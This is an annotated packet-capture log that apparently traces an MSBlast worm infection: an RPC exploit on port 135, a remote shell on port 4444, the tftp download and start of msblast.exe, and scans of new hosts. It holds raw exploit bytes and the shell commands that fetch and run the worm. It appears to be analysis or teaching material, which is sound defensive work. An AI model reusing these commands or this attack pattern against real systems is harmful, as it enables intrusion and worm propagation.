MSBLAST.A Hacking pattern
08/15-11:17:24.711562 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56943 IpLen:20 DgmLen:48 DF
******S* Seq: 0xCA05EE77 Ack: 0x0 Win: 0x16D0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:24.712316 137.189.99.200:135 -> 205.186.81.25:1043
TCP TTL:128 TOS:0x0 ID:103 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0xB08DABC Ack: 0xCA05EE78 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:25.335727 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56960 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA05EE78 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:26.509720 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56961 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0xCA05EE78 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20
........H......................................F.....]..........
+.H`....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:26.512318 137.189.99.200:135 -> 205.186.81.25:1043
TCP TTL:128 TOS:0x0 ID:104 IpLen:20 DgmLen:100 DF
***AP*** Seq: 0xB08DABD Ack: 0xCA05EEC0 Win: 0xFAA8 TcpLen: 20
........<............)....135............]..........+.H`....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:26.855995 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56962 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0xCA05EEC0 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20
....................................2$X..EdI.p..t,..`^..........
p^......|^..............*M...j. .nr.....MARB....................
... ...MEOW...................F8..............F................
............MEOW.....................................(..d)......
...................F...............F...............F............
...F...............F...............F...............F....`...X...
....@... ...8...0...............P...O.. ........................
................................................................
H.....f................F....................x...X...........p...
.O...=.W....2.1..................................C......`...`...
MEOW...................F;..............F....0..............J....
Poz.....................................0...x.n.................
/......................F.X.................0...................
........h.......h...........................\.\.F.X.N.B.F.X.F.X.
N.B.F.X.F.X.F.X.F.X.............................................
................................................................
................................................................
.........^1........6..2.................S..tWu.......Z....|..2..
.:k...M.q....2...Z...2.......A......6t...Z.~.$|..2..."k..LLb....
.2........y|.....2.........u..j..2..........x.z..2........9.V.J.
.2............Z..2.........F..*..2....k.S....f...2...*...b...bk.
..L..Z...n.L.$..@d.......c.....P.W...Z........x.2.....].~'?bB...
.vj......z...~...b..."...c...c.......".L..k.@d..wek.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:26.944240 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56963 IpLen:20 DgmLen:284 DF
***AP*** Seq: 0xCA05F474 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20
.....d.!.2..:...4r....9..:..4r........Q......g..4^..4w...7..j...
4h..b...4...J.k|..8.{F.Ap?.xT....&.a4h..bT..........41Qk..T.jm..
..../...\.C.$.\.1.2.3.4.5.6.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1...d.o.
c........... ...0.-......*..........(...............
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:26.944542 137.189.99.200:135 -> 205.186.81.25:1043
TCP TTL:128 TOS:0x0 ID:105 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xB08DAF9 Ack: 0xCA05F568 Win: 0xFAF0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:26.950832 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56964 IpLen:20 DgmLen:40 DF
***A***F Seq: 0xCA05F568 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:26.951104 137.189.99.200:135 -> 205.186.81.25:1043
TCP TTL:128 TOS:0x0 ID:106 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xB08DAF9 Ack: 0xCA05F569 Win: 0xFAF0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:26.951210 137.189.99.200:135 -> 205.186.81.25:1043
TCP TTL:128 TOS:0x0 ID:107 IpLen:20 DgmLen:40 DF
***A***F Seq: 0xB08DAF9 Ack: 0xCA05F569 Win: 0xFAF0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Open a remote shell on port 4444 at the TARGET
08/15-11:17:26.964427 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:56965 IpLen:20 DgmLen:48 DF
******S* Seq: 0xCA1A3C5A Ack: 0x0 Win: 0x16D0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:26.964711 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:108 IpLen:20 DgmLen:40
***A*R** Seq: 0x0 Ack: 0xCA1A3C5B Win: 0x0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:27.070517 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56966 IpLen:20 DgmLen:40 DF
*****R** Seq: 0xCA05F569 Ack: 0x0 Win: 0x0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:27.432648 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56967 IpLen:20 DgmLen:40
*****R** Seq: 0xCA05F568 Ack: 0xCA05F568 Win: 0x0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:27.450470 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56968 IpLen:20 DgmLen:40
*****R** Seq: 0xCA05F569 Ack: 0xCA05F569 Win: 0x0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:27.468662 205.186.81.25:1043 -> 137.189.99.200:135
TCP TTL:111 TOS:0x0 ID:56969 IpLen:20 DgmLen:40
*****R** Seq: 0xCA05F569 Ack: 0xCA05F569 Win: 0x0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:27.915007 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:56986 IpLen:20 DgmLen:48 DF
******S* Seq: 0xCA1A3C5A Ack: 0x0 Win: 0x16D0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:27.915325 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:109 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0xB15C83C Ack: 0xCA1A3C5B Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:28.421027 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:56987 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA1A3C5B Ack: 0xB15C83D Win: 0x16D0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Download the worm via TFTP from the source
08/15-11:17:28.509338 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:56988 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0xCA1A3C5B Ack: 0xB15C83D Win: 0x16D0 TcpLen: 20
tftp -i 205.186.81.25 GET msblast.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:28.640310 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:110 IpLen:20 DgmLen:79 DF
***AP*** Seq: 0xB15C83D Ack: 0xCA1A3C81 Win: 0xFACA TcpLen: 20
Microsoft Windows XP [Version 5.1.2600]
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:28.762953 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:111 IpLen:20 DgmLen:48
Len: 28
..msblast.exe.octet.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:29.377219 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:56989 IpLen:20 DgmLen:544
Len: 524
....MZ......................@...................................
............!..L.!This program cannot be run in DOS mode....$...
....PE..L...*|7?...............7. .......P...q...`........@.....
................................................................
........H.......................................................
............................................................UPX0
.....P..............................UPX1..... ...`..............
........@...UPX2................................@...1.22.UPX!...
...F
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:29.378736 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:112 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:29.381746 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:56990 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA1A3C81 Ack: 0xB15C864 Win: 0x16A9 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:29.382051 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:113 IpLen:20 DgmLen:143 DF
***AP*** Seq: 0xB15C864 Ack: 0xCA1A3C81 Win: 0xFACA TcpLen: 20
..(C) Copyright 1985-2001 Microsoft Corp.....C:\WINDOWS\system32
>tftp -i 205.186.81.25 GET msblast.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:30.027365 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57000 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA1A3C81 Ack: 0xB15C8CB Win: 0x1642 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:30.376830 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:114 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:30.451366 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57001 IpLen:20 DgmLen:544
Len: 524
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:30.452632 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:115 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:31.327318 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57017 IpLen:20 DgmLen:544
Len: 524
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:31.328897 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:116 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:32.207793 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57018 IpLen:20 DgmLen:544
Len: 524
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:32.208243 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:117 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:33.113666 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57019 IpLen:20 DgmLen:544
Len: 524
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:33.115215 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:118 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:34.112078 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:119 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:34.128000 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57036 IpLen:20 DgmLen:544
Len: 524
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:34.128697 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:120 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:34.916282 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57037 IpLen:20 DgmLen:544
Len: 524
....@D....HLP....TX....\`l....pt................................
..E.6......@.....0@.<1@.....msblast.exe.I ju. wan.....to say LOV
E YOU SAN!!.bill...m.gates&h.d%you make..~.1hi.possiQ.?1[{..Bp.i
ng.one-Wd.... fix2r]oftireU..=o......H.................F..*..]..
........+.H`KG.........?...._..K.2$X..EdI.p..t,..`.>7.^..p.G|...
........*M...j. .nr..MA..~.RB3............36..EOW...`...8..0.(..
f.........C...@.A....(..6d_.d)....s..C2$C...$C2$...i./s`.X.@....
x...P....O.. ......._H.f.........+.x......d.p....O...=.W.W2.1'l
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:34.917748 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:121 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:35.819775 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57038 IpLen:20 DgmLen:544
Len: 524
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:35.820186 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:122 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:36.718626 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57039 IpLen:20 DgmLen:544
Len: 524
....Q......g..4^..4w...7......j..h..b...4..J.|......8.{F.Ap?.xT.
...&.a#.T..............41Qk..T.jm...W/...id.W -..*....{..(......
D..wNtwsupd......com.%s...Q.+QI..tU.c..u-i. GET.%d..S.C~.%i..rb.
..6.\.A|IGY\.....u.b.SOFTW.....E\Micro.\W&[.(.\C..+V.^..er..\Ru.
.I...^Y/".V.\V.W.JxV.V.....U.R..l..i.....S.4M...,8HM.4MP`p......
4..SW...3.f..O.T.0..i.@Xl|..w..i...T?...; M...UK.$4M.4,8@HT.4M.`
hp|....M..U...9A.P@...-[.(......G<.%l..r....T.`......./..,B.Exit
ProcessK...Thread.GetComm.L.K4.ineA.D.For.t.n.g.L.Er=r.....Modul
.i.N
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:36.719706 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:123 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:37.615930 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57040 IpLen:20 DgmLen:544
Len: 524
....am1....MHEl.Clos......Tickeunt.RtlUn.n..M%.hMu.x3....S+ep.Te
w...f.a.%...7{..lRegeKey.&.[...EL.SvValue...i66..__.aaA3.7.rg.2o
i.e....wfcO.open.~.....mcpy..%r;.m..$..sig.l.prQX{0wtf..trc.....
.`k~. I%.m...nGun.c.dS.f..t.#..Ah2n..P..i.*s.kui...u3_.dr.Foa.nW
h.?v..helK...{.~. .t@.m....Ig.h.tb....y.m.bi..s..a..WSA....6vup.
Cf..c...Bl:..:g..7.p.:EA*?.. 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:124 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:38.486363 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57041 IpLen:20 DgmLen:544
Len: 524
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:38.489495 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:125 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:39.265333 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57042 IpLen:20 DgmLen:544
Len: 524
....................x...........................................
................................................................
............................$.......@.......KERNEL32.DLL.ADVAPI3
2.DLL.CRTDLL.DLL.WININET.DLL.WS2_32.DLL...LoadLibraryA..GetProcA
ddress..ExitProcess...RegCloseKey...atoi..InternetGetConnectedSt
ate...send......................................................
................................................................
................................................................
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:39.265798 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:126 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:40.069496 205.186.81.25:69 -> 137.189.99.200:1030
UDP TTL:111 TOS:0x0 ID:57043 IpLen:20 DgmLen:64
Len: 44
........ ....... ........&...0...B..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:40.070445 137.189.99.200:1030 -> 205.186.81.25:69
UDP TTL:128 TOS:0x0 ID:127 IpLen:20 DgmLen:32
Len: 12
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:40.088572 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:128 IpLen:20 DgmLen:101 DF
***AP*** Seq: 0xB15C8CB Ack: 0xCA1A3C81 Win: 0xFACA TcpLen: 20
Transfer successful: 6176 bytes in 11 seconds, 561 bytes/s...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:40.789679 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57044 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA1A3C81 Ack: 0xB15C908 Win: 0x1605 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:40.789702 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:129 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0xB15C908 Ack: 0xCA1A3C81 Win: 0xFACA TcpLen: 20
..C:\WINDOWS\system32>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.400056 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57045 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA1A3C81 Ack: 0xB15C91E Win: 0x15EF TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.505872 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57046 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0xCA1A3C81 Ack: 0xB15C91E Win: 0x15EF TcpLen: 20
start msblast.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.506289 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:130 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0xB15C91E Ack: 0xCA1A3C93 Win: 0xFAB8 TcpLen: 20
start msblast.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Start the worm and scan other targets
08/15-11:17:41.859729 137.189.99.200:1031 -> 168.235.185.1:135
TCP TTL:128 TOS:0x0 ID:131 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB4B518E Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.859735 137.189.99.200:1032 -> 168.235.185.2:135
TCP TTL:128 TOS:0x0 ID:132 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB4BD7BB Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.861825 137.189.99.200:1033 -> 168.235.185.3:135
TCP TTL:128 TOS:0x0 ID:133 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB4CCEF8 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.861827 137.189.99.200:1034 -> 168.235.185.4:135
TCP TTL:128 TOS:0x0 ID:134 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB4D912F Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.861832 137.189.99.200:1035 -> 168.235.185.5:135
TCP TTL:128 TOS:0x0 ID:135 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB4E32C3 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.861833 137.189.99.200:1036 -> 168.235.185.6:135
TCP TTL:128 TOS:0x0 ID:136 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB4ECBAD Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.861835 137.189.99.200:1037 -> 168.235.185.7:135
TCP TTL:128 TOS:0x0 ID:137 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB4FC5B1 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.862291 137.189.99.200:1038 -> 168.235.185.8:135
TCP TTL:128 TOS:0x0 ID:138 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB50AC9D Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.862391 137.189.99.200:1039 -> 168.235.185.9:135
TCP TTL:128 TOS:0x0 ID:139 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB51895C Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
